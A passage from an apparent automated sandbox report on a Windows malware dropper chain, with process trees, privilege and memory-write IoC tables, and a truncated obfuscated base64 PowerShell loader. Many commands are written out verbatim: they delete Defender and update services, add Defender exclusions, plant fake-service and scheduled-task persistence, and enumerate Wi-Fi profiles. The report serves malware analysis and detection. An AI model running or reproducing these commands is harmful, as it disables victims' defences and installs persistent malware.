3292	updater.exe
3156	powershell.exe
3156	powershell.exe
3156	powershell.exe
3292	updater.exe
3292	updater.exe
3292	updater.exe
3292	updater.exe
3292	updater.exe
3292	updater.exe
3292	updater.exe
3292	updater.exe
3292	updater.exe
3292	updater.exe
3292	updater.exe
3292	updater.exe
4772	9sWdA2p.exe
4772	9sWdA2p.exe
4772	9sWdA2p.exe
4772	9sWdA2p.exe
4772	9sWdA2p.exe
4772	9sWdA2p.exe
4832	explorer.exe
4832	explorer.exe
4832	explorer.exe
4832	explorer.exe
4832	explorer.exe
4832	explorer.exe
4832	explorer.exe
4832	explorer.exe
4832	explorer.exe
4832	explorer.exe
4832	explorer.exe
4832	explorer.exe
4832	explorer.exe
4832	explorer.exe
4832	explorer.exe
4832	explorer.exe
4832	explorer.exe
4832	explorer.exe

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
656	Process not Found
656	Process not Found

Suspicious use of AdjustPrivilegeToken 20 IoCs

description	pid	Process
Token: SeDebugPrivilege	2700	powershell.exe
Token: SeShutdownPrivilege	3844	powercfg.exe
Token: SeCreatePagefilePrivilege	3844	powercfg.exe
Token: SeShutdownPrivilege	3852	powercfg.exe
Token: SeCreatePagefilePrivilege	3852	powercfg.exe
Token: SeShutdownPrivilege	3748	powercfg.exe
Token: SeCreatePagefilePrivilege	3748	powercfg.exe
Token: SeShutdownPrivilege	2612	powercfg.exe
Token: SeCreatePagefilePrivilege	2612	powercfg.exe
Token: SeDebugPrivilege	3156	powershell.exe
Token: SeShutdownPrivilege	3224	powercfg.exe
Token: SeCreatePagefilePrivilege	3224	powercfg.exe
Token: SeLockMemoryPrivilege	4832	explorer.exe
Token: SeShutdownPrivilege	4896	powercfg.exe
Token: SeCreatePagefilePrivilege	4896	powercfg.exe
Token: SeShutdownPrivilege	4104	powercfg.exe
Token: SeCreatePagefilePrivilege	4104	powercfg.exe
Token: SeShutdownPrivilege	1336	powercfg.exe
Token: SeCreatePagefilePrivilege	1336	powercfg.exe
Token: SeDebugPrivilege	4000	Yhihb8G.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4916	random.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4916 wrote to memory of 1456	4916	random.exe	90
PID 4916 wrote to memory of 1456	4916	random.exe	90
PID 4916 wrote to memory of 1456	4916	random.exe	90
PID 1456 wrote to memory of 3148	1456	rapes.exe	96
PID 1456 wrote to memory of 3148	1456	rapes.exe	96
PID 1456 wrote to memory of 3148	1456	rapes.exe	96
PID 3148 wrote to memory of 3612	3148	apple.exe	97
PID 3148 wrote to memory of 3612	3148	apple.exe	97
PID 3148 wrote to memory of 3612	3148	apple.exe	97
PID 3612 wrote to memory of 2852	3612	261.exe	99
PID 3612 wrote to memory of 2852	3612	261.exe	99
PID 2852 wrote to memory of 3140	2852	cmd.exe	101
PID 2852 wrote to memory of 3140	2852	cmd.exe	101
PID 2852 wrote to memory of 3140	2852	cmd.exe	101
PID 3140 wrote to memory of 2348	3140	261.exe	102
PID 3140 wrote to memory of 2348	3140	261.exe	102
PID 2348 wrote to memory of 5076	2348	cmd.exe	104
PID 2348 wrote to memory of 5076	2348	cmd.exe	104
PID 2348 wrote to memory of 512	2348	cmd.exe	105
PID 2348 wrote to memory of 512	2348	cmd.exe	105
PID 2348 wrote to memory of 2708	2348	cmd.exe	106
PID 2348 wrote to memory of 2708	2348	cmd.exe	106
PID 2348 wrote to memory of 1452	2348	cmd.exe	109
PID 2348 wrote to memory of 1452	2348	cmd.exe	109
PID 2348 wrote to memory of 672	2348	cmd.exe	110
PID 2348 wrote to memory of 672	2348	cmd.exe	110
PID 2348 wrote to memory of 3448	2348	cmd.exe	111
PID 2348 wrote to memory of 3448	2348	cmd.exe	111
PID 2348 wrote to memory of 1036	2348	cmd.exe	112
PID 2348 wrote to memory of 1036	2348	cmd.exe	112
PID 2348 wrote to memory of 2992	2348	cmd.exe	113
PID 2348 wrote to memory of 2992	2348	cmd.exe	113
PID 2348 wrote to memory of 4104	2348	cmd.exe	114
PID 2348 wrote to memory of 4104	2348	cmd.exe	114
PID 2348 wrote to memory of 2788	2348	cmd.exe	115
PID 2348 wrote to memory of 2788	2348	cmd.exe	115
PID 2348 wrote to memory of 1672	2348	cmd.exe	116
PID 2348 wrote to memory of 1672	2348	cmd.exe	116
PID 2348 wrote to memory of 4916	2348	cmd.exe	117
PID 2348 wrote to memory of 4916	2348	cmd.exe	117
PID 2348 wrote to memory of 5108	2348	cmd.exe	118
PID 2348 wrote to memory of 5108	2348	cmd.exe	118
PID 2348 wrote to memory of 3372	2348	cmd.exe	119
PID 2348 wrote to memory of 3372	2348	cmd.exe	119
PID 2348 wrote to memory of 864	2348	cmd.exe	120
PID 2348 wrote to memory of 864	2348	cmd.exe	120
PID 2348 wrote to memory of 1864	2348	cmd.exe	121
PID 2348 wrote to memory of 1864	2348	cmd.exe	121
PID 2348 wrote to memory of 4496	2348	cmd.exe	122
PID 2348 wrote to memory of 4496	2348	cmd.exe	122
PID 2348 wrote to memory of 3224	2348	cmd.exe	123
PID 2348 wrote to memory of 3224	2348	cmd.exe	123
PID 2348 wrote to memory of 392	2348	cmd.exe	124
PID 2348 wrote to memory of 392	2348	cmd.exe	124
PID 2348 wrote to memory of 4572	2348	cmd.exe	125
PID 2348 wrote to memory of 4572	2348	cmd.exe	125
PID 2348 wrote to memory of 3556	2348	cmd.exe	126
PID 2348 wrote to memory of 3556	2348	cmd.exe	126
PID 2348 wrote to memory of 1572	2348	cmd.exe	127
PID 2348 wrote to memory of 1572	2348	cmd.exe	127
PID 2348 wrote to memory of 4736	2348	cmd.exe	128
PID 2348 wrote to memory of 4736	2348	cmd.exe	128
PID 2348 wrote to memory of 5112	2348	cmd.exe	129
PID 2348 wrote to memory of 5112	2348	cmd.exe	129

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Yhihb8G.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Yhihb8G.exe

C:\Users\Admin\AppData\Local\Temp\random.exe
"C:\Users\Admin\AppData\Local\Temp\random.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4916
- C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
  "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Downloads MZ/PE file
  - Checks BIOS information in registry
  - Checks computer location settings
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:1456
- - C:\Users\Admin\AppData\Local\Temp\10429160101\apple.exe
    "C:\Users\Admin\AppData\Local\Temp\10429160101\apple.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3148
  - - C:\Users\Admin\AppData\Local\Temp\261.exe
      "C:\Users\Admin\AppData\Local\Temp\261.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3612
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A596.tmp\A597.tmp\A598.bat C:\Users\Admin\AppData\Local\Temp\261.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2852
      - C:\Users\Admin\AppData\Local\Temp\261.exe
        
        "C:\Users\Admin\AppData\Local\Temp\261.exe" go
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3140
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A6DF.tmp\A6E0.tmp\A6E1.bat C:\Users\Admin\AppData\Local\Temp\261.exe go"
        7⤵
        Drops file in Program Files directory
        Suspicious use of WriteProcessMemory
        
        PID:2348
        
        C:\Windows\system32\sc.exe
        
        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
        8⤵
        Launches sc.exe
        
        PID:5076
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        8⤵
        Launches sc.exe
        
        PID:512
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        8⤵
        Delays execution with timeout.exe
        
        PID:2708
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        8⤵
        Launches sc.exe
        
        PID:1452
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        8⤵
        Launches sc.exe
        
        PID:672
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3448
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1036
        
        C:\Windows\system32\sc.exe
        
        sc stop "WinDefend"
        8⤵
        Launches sc.exe
        
        PID:2992
        
        C:\Windows\system32\sc.exe
        
        sc delete "WinDefend"
        8⤵
        Launches sc.exe
        
        PID:4104
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
        8⤵
        
        PID:2788
        
        C:\Windows\system32\sc.exe
        
        sc stop "MDCoreSvc"
        8⤵
        Launches sc.exe
        
        PID:1672
        
        C:\Windows\system32\sc.exe
        
        sc delete "MDCoreSvc"
        8⤵
        Launches sc.exe
        
        PID:4916
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
        8⤵
        
        PID:5108
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisSvc"
        8⤵
        Launches sc.exe
        
        PID:3372
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisSvc"
        8⤵
        Launches sc.exe
        
        PID:864
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
        8⤵
        
        PID:1864
        
        C:\Windows\system32\sc.exe
        
        sc stop "Sense"
        8⤵
        Launches sc.exe
        
        PID:4496
        
        C:\Windows\system32\sc.exe
        
        sc delete "Sense"
        8⤵
        Launches sc.exe
        
        PID:3224
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
        8⤵
        
        PID:392
        
        C:\Windows\system32\sc.exe
        
        sc stop "wscsvc"
        8⤵
        Launches sc.exe
        
        PID:4572
        
        C:\Windows\system32\sc.exe
        
        sc delete "wscsvc"
        8⤵
        Launches sc.exe
        
        PID:3556
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
        8⤵
        Modifies security service
        
        PID:1572
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmBroker"
        8⤵
        Launches sc.exe
        
        PID:4736
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmBroker"
        8⤵
        Launches sc.exe
        
        PID:5112
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
        8⤵
        
        PID:3756
        
        C:\Windows\system32\sc.exe
        
        sc stop "SecurityHealthService"
        8⤵
        Launches sc.exe
        
        PID:4168
        
        C:\Windows\system32\sc.exe
        
        sc delete "SecurityHealthService"
        8⤵
        Launches sc.exe
        
        PID:3292
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
        8⤵
        
        PID:3868
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefsvc"
        8⤵
        Launches sc.exe
        
        PID:4512
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefsvc"
        8⤵
        Launches sc.exe
        
        PID:2580
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
        8⤵
        
        PID:3884
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefusersvc"
        8⤵
        Launches sc.exe
        
        PID:2244
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefusersvc"
        8⤵
        Launches sc.exe
        
        PID:1540
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
        8⤵
        
        PID:4148
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisDrv"
        8⤵
        Launches sc.exe
        
        PID:3784
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisDrv"
        8⤵
        Launches sc.exe
        
        PID:3424
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
        8⤵
        
        PID:3364
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdBoot"
        8⤵
        Launches sc.exe
        
        PID:2472
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdBoot"
        8⤵
        Launches sc.exe
        
        PID:4228
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
        8⤵
        
        PID:1512
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdFilter"
        8⤵
        Launches sc.exe
        
        PID:4504
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdFilter"
        8⤵
        Launches sc.exe
        
        PID:4372
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
        8⤵
        
        PID:2936
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmAgent"
        8⤵
        Launches sc.exe
        
        PID:4316
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmAgent"
        8⤵
        Launches sc.exe
        
        PID:1316
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
        8⤵
        
        PID:1916
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecWfp"
        8⤵
        Launches sc.exe
        
        PID:652
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecWfp"
        8⤵
        Launches sc.exe
        
        PID:680
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
        8⤵
        
        PID:2356
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecFlt"
        8⤵
        Launches sc.exe
        
        PID:4412
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecFlt"
        8⤵
        Launches sc.exe
        
        PID:2836
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
        8⤵
        
        PID:1060
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecCore"
        8⤵
        Launches sc.exe
        
        PID:700
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecCore"
        8⤵
        Launches sc.exe
        
        PID:2164
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
        8⤵
        
        PID:3860
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
        8⤵
        
        PID:1852
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
        8⤵
        
        PID:3480
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
        8⤵
        
        PID:3568
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
        8⤵
        
        PID:1792
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        8⤵
        Launches sc.exe
        
        PID:1944
        
        C:\Windows\system32\sc.exe
        
        sc delete ddrver
        8⤵
        Launches sc.exe
        
        PID:1352
- - C:\Users\Admin\AppData\Local\Temp\10429530101\P3Ow4LV.exe
    "C:\Users\Admin\AppData\Local\Temp\10429530101\P3Ow4LV.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    PID:2708
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2700
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:400
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:3848
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      4⤵
      Launches sc.exe
      PID:4464
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:4404
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      4⤵
      Launches sc.exe
      PID:2168
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      4⤵
      Launches sc.exe
      PID:3624
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      4⤵
      Launches sc.exe
      PID:1688
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:3844
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:3748
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:3852
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:2612
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
      4⤵
      Launches sc.exe
      PID:4104
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
      4⤵
      Launches sc.exe
      PID:4148
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      4⤵
      Launches sc.exe
      PID:4320
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
      4⤵
      Launches sc.exe
      PID:4364
- - C:\Users\Admin\AppData\Local\Temp\10429610101\9sWdA2p.exe
    "C:\Users\Admin\AppData\Local\Temp\10429610101\9sWdA2p.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:4772
- - C:\Users\Admin\AppData\Local\Temp\10430350101\i4cwegu.exe
    "C:\Users\Admin\AppData\Local\Temp\10430350101\i4cwegu.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3916
- - C:\Users\Admin\AppData\Local\Temp\10431490101\Yhihb8G.exe
    "C:\Users\Admin\AppData\Local\Temp\10431490101\Yhihb8G.exe"
    3⤵
    - Executes dropped EXE
    - Accesses Microsoft Outlook profiles
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Suspicious use of AdjustPrivilegeToken
    - outlook_office_path
    - outlook_win_path
    PID:4000
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
      4⤵
      System Location Discovery: System Language Discovery
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:2852
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4504
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh wlan show profile
        5⤵
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:1384
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr All
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4440
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4000 -s 2412
      4⤵
      Program crash
      PID:4896
- - C:\Users\Admin\AppData\Local\Temp\10432200101\j31kf1f.exe
    "C:\Users\Admin\AppData\Local\Temp\10432200101\j31kf1f.exe"
    3⤵
    - Executes dropped EXE
    PID:700
- - C:\Users\Admin\AppData\Local\Temp\10432230101\but2.exe
    "C:\Users\Admin\AppData\Local\Temp\10432230101\but2.exe"
    3⤵
    PID:968
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks" /create /tn "PCI Bus Driver" /tr C:\Drivers\pcidrv.exe /sc minute /mo 1 /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:540
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks" /create /tn "PCI Bus Driver Startup" /tr C:\Drivers\pcidrv.exe /sc onstart /ru SYSTEM /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2712
  - - C:\Drivers\pcidrv.exe
      C:\Drivers\pcidrv.exe
      4⤵
      PID:3476
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd" /C timeout /t 2 && del C:\Users\Admin\AppData\Local\Temp\10432230101\but2.exe
      4⤵
      PID:4928
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 2
        5⤵
        Delays execution with timeout.exe
        
        PID:1676
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10432611121\SURG9Yv.cmd"
    3⤵
    PID:840
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10432611121\SURG9Yv.cmd"
      4⤵
      PID:5016
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1